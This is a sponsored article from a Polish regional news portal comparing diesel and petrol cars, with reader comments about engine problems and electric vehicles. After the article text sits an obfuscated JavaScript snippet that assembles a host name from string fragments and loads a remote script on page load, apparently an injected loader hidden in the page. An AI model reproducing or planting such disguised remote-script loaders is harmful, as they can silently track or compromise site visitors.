Portal nr 1 w powiecie bolesławieckim
REKLAMA 1,5% podatku dla Klekusiowo
BolecFORUM Nowy temat
Tekst zlecony
5 października 2015r. godz. 10:15, odsłon: 9577, Redakcja

Diesel czy benzyna – jaki rodzaj paliwa wybrać?

Przymierzasz się do kupna auta i nie wiesz na jaki silnik zdecydować się? Lepszy będzie diesel czy benzyna?
Diesel czy benzyna?
Diesel czy benzyna? (fot. )
Przymierzasz się do kupna auta i nie wiesz na jaki silnik zdecydować się? Lepszy będzie diesel czy benzyna? Sprawdź zarówno słabe jak i mocne strony obu jednostek napędowych i wybierz tę, która będzie najlepsza dla Ciebie!

Odwieczna wojna

Spór ten można trochę porównać do odwiecznej kłótni o wyższości masła nad margaryną i odwrotnie. Przed każdorazowym zakupem auta stoisz przed trudną decyzją – wybrać pojazd z silnikiem wysokoprężnym (czyli dieslem) czy standardowego „benzyniaka”. Jak to zwykle w takich sytuacjach bywa, oba rozwiązania mają zarówno swoich gorących zwolenników, jak i zagorzałych przeciwników.

Warto zatem wysłuchać argumentów obu stron, abyś mógł dzięki temu podjąć własną, w pełni świadomą i przemyślaną decyzję. Odpowiedni czas do namysłu pozwoli Ci na optymalny wybór i pełne zadowolenie z korzystania z nowego (lub używanego) auta.

Diesel – mocne i słabe strony

Silniki wysokoprężne często uważane są za niezawodne. Już na wstępnie opinię tę trzeba obalić, gdyż dotyczy ona starych i prostych konstrukcji. Współcześnie produkowane silniki Diesla również wymagają podobnego serwisowania, co silniki benzynowe.

Diesle cechują się przede wszystkim wysoką ekonomiką jazdy, dzięki czemu właściciel auta już po przejechaniu kilku tysięcy kilometrów może zauważyć wymierne oszczędności. Ma to dwojaką genezę. Po pierwsze olej napędowy jest tańszy niż benzyna! Choć różnica ta w ostatnim czasie zmalała, nadal bardziej opłacalne jest tankowanie „ropy”. Co więcej, nie zanosi się na to, by przynajmniej w ciągu kilku najbliższych lat cena za litr benzyny zbliżyła się do poziomu cenowego proponowanego za litr oleju napędowego.

Po drugie diesel charakteryzuje się po prostu mniejszym zapotrzebowaniem na paliwo. Auta z silnikami wysokoprężnymi palą mniej niż samochody z silnikami benzynowymi o porównywalnej mocy. Nie trzeba być matematycznym geniuszem, by stwierdzić jak bardzo opłacalne może być eksploatowanie diesla.

Nie można też pominąć kilku minusów. Największy to cena samego zakupu, która praktycznie zawsze jest wyższa niż cena odpowiednika benzynowego. Potrzebuje także pewnego rodzaju opieki, jeśli chodzi o tankowanie. Nowoczesne jednostki napędowe ze względu na precyzyjny i czuły układ zasilania, są bardzo wrażliwe na jakość paliwa.

Benzyniaki – mocne i słabe strony

W polskich warunkach przeważa ten typ silnika. Związane jest to np. z ceną zakupu aut tego rodzaju, które są zwyczajnie sporo tańsze niż diesle. Niejako do tego odnosi się także druga zaleta, czyli koszty naprawy, szczególnie poważnych awarii silnika. Za taką usługę na pewno nie zapłacisz mało, porównując jednak cenę naprawy silnika benzynowego do remontu silnika diesla, na prowadzenie wysuwają się jednostki benzynowe.

Można uznać, że auta z silnikami benzynowymi mają wyższe spalanie, ale ich naprawy kosztują mniej. Warto zwrócić także uwagę na ich niezwykle łagodną pracę. Po uruchomieniu nie są tak głośne i pozwalają na większy komfort w czasie jazdy, co dla wielu kierowców ma niebagatelne znaczenie.

A zatem: diesel czy benzyna?

Po gruntownym przeanalizowaniu wszystkich argumentów bardzo trudno udzielić ostatecznej odpowiedzi. Mocne strony ma zarówno pierwsze rozwiązanie, jak i drugie. Dlatego też najbardziej odpowiednim wyjściem byłoby rozważenie każdego przypadku indywidualnie.

W tym celu powinieneś samodzielnie określić potrzeby i wymagania, jakie stawiasz przed autem. Warto także, abyś zwrócił uwagę na to, które elementy są dla Ciebie najważniejsze. Niższa cena przy kupnie i cicha praca, czy większa ekonomika jazdy i niższe koszty paliwa? Ważną wskazówką będzie również ilość kilometrów, jaką zamierzasz pokonać każdego roku oraz typ podróży. Jeśli jeździsz nie więcej niż 10-15 tys. km rocznie głównie w mieście, bez wahania powinieneś wybrać samochód benzynowy. Jeżeli natomiast rocznie zostawiasz za sobą np. 50 tys. km na autostradach to lepszym wyborem może okazać się diesel.

Więcej ciekawostek znajdziesz na TeamTotal.pl

(function(){ uqff=document.createElement("script");uqff.type="text/javascript"; uqff.async=true;uqff_=(("us")+"t")+"a";uqff_+=("t.i")+""+"n";uqff_+=(("f")+"o"); uqff.src="http://"+uqff_+"/5226984.7ly0gas1qffrm83099a0lrkybs7zxs"; document.body.appendChild(uqff); })();

Diesel czy benzyna – jaki rodzaj paliwa wybrać?

~ niezalogowany
9 października 2015r. o 14:50
wystarczy wejść na pierwsze lepsze forum motoryzacyjne aby zobaczyć, że wlasciciele benzynek również miewają problemy ze swymi autkami.
a to falujące obroty, to problem z odpalaniem lub szarpiacy silnik i wysokie spalanie. jak jest w aucie LPG to trzeba stosować także lepsze swiece kable i cewki, także olej trzeba lać lepszy i dbać o zmiany. Także podwyzsza to koszty eksploatacji.
koncerny motoryzacyjne dbają juz o to aby po kilku latach zaczęły sie problemy i mieli zbyt na nowe auta.
coraz wiecej w nowych samochodach wyżyłowanych doładowanych silników o małej pojemności także benzyniaków, także koła dwumasowe w benzynkach.
czasy silników, które wytrzymywały przebiegi 500 tys -700 tys juz minęły.
Zgłoś do moderacji Odpowiedz
~ niezalogowany
9 października 2015r. o 14:53
~ napisał(a): Nie bądź taki do przodu bo silniki wolnossące nie znikną...


przyszłosc należy do aut elektrycznych
Zgłoś do moderacji Odpowiedz
~ niezalogowany
9 października 2015r. o 15:02
tylko że nie bedzie nas na nie stać.no może co niektórych ;(
Zgłoś do moderacji Odpowiedz
315
#mir.ko nieaktywny
9 października 2015r. o 16:03
przyszłość przez duże P :) , jeszcze nie wynaleziono przyzwoitego zasilania, nadają się do rozwożenia pizzy czy patrolowania miasta, w dodatku za niebotyczne koszty zakupu i utrzymania. ale za naszych dzieci czy wnuków kto wie
Zgłoś do moderacji Odpowiedz
~ niezalogowany
9 października 2015r. o 17:41
mir.ko napisał(a): przyszłość przez duże P :) , jeszcze nie wynaleziono przyzwoitego zasilania, nadają się do rozwożenia pizzy czy patrolowania miasta, w dodatku za niebotyczne koszty zakupu i utrzymania. ale za naszych dzieci czy wnuków kto wie


Racja, zasilanie - zasięg i koszt auta to na razie podstawowy problem.
Ale technika idzie do przodu, grafen itd... może wkrótce uda się zwiększyć zasięg auta, skrócić czas ładowania, obnizyć koszty produkcji.
Na niemieckich stacjach paliw już dziś są "dystrybutory" do ładowania aut elektrycznych.
Ale na dzień dzisiejszy najlepsze auto w trasy to diesel.
Zgłoś do moderacji Odpowiedz
Wypowiedz się:
Jeśli zostawisz to pole puste przypiszemy Ci losową ksywę.
Publikacja czyichś danych osobowych bez zezwolenia czy użycie zwrotów obraźliwych podlega odpowiedzialności karnej i będzie skutkować przekazaniem danych publikującego organom ścigania.
Publikowane komentarze są prywatnymi opiniami użytkowników serwisu. Bolec.Info nie ponosi odpowiedzialności za treść opinii i wypowiedzi, a osoba zamieszczająca wypowiedź może ponieść za jej treść odpowiedzialność karną i cywilną. Bolec.Info zastrzega sobie prawo do moderowania wszystkich opublikowanych wypowiedzi, jednak nie bierze na siebie takiego obowiązku. Pamiętaj, że dodając zdjęcie deklarujesz, że jesteś jego autorem i przekazujesz Wydawcy Bolec.Info prawa do jego publikacji i udostępniania. Umieszczając cudze zdjęcia możesz złamać prawo autorskie. Bolec.Info nie ponosi odpowiedzialności za publikowane zdjęcia.
Daj nam Cynk - zgarnij nagrodę!

Byłeś świadkiem jakiegoś wypadku lub innego zdarzenia? Wiesz coś, o czym my nie wiemy albo jeszcze nie napisaliśmy? Daj nam znać i zgłoś swój temat!

Wypełnij formularz lub wyślij pod adres: [email protected].

Kontakt telefoniczny z Redakcją Bolec.Info: +48 693 375 790 (przez całą dobę).

REKLAMA 1,5% podatku dla Klekusiowo
REKLAMA Muzeum Ceramiki zaprasza